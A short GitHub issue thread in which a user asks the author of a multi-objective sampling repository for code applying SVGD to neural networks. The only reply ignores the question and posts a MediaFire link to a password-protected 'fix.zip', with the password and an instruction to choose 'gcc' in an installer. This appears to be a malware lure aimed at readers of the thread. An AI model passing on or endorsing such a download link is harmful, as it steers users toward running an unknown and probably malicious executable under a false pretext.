### ISSUE TITLE
SVGD with neural networks

### ISSUE THREAD

**Issue by huangzhaor** [gnobitab/MultiObjectiveSampling#1]
May I ask if the author can open source the source code steps for applying Stein variant gradient descent (SVGD) to neural networks, as the code writing for combining SVGD with stochastic gradient descent on benchmark functions and neural networks seems to be very different and difficult to transfer. I wonder if I can get your help？

**Comment by xiaobai-marker** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."
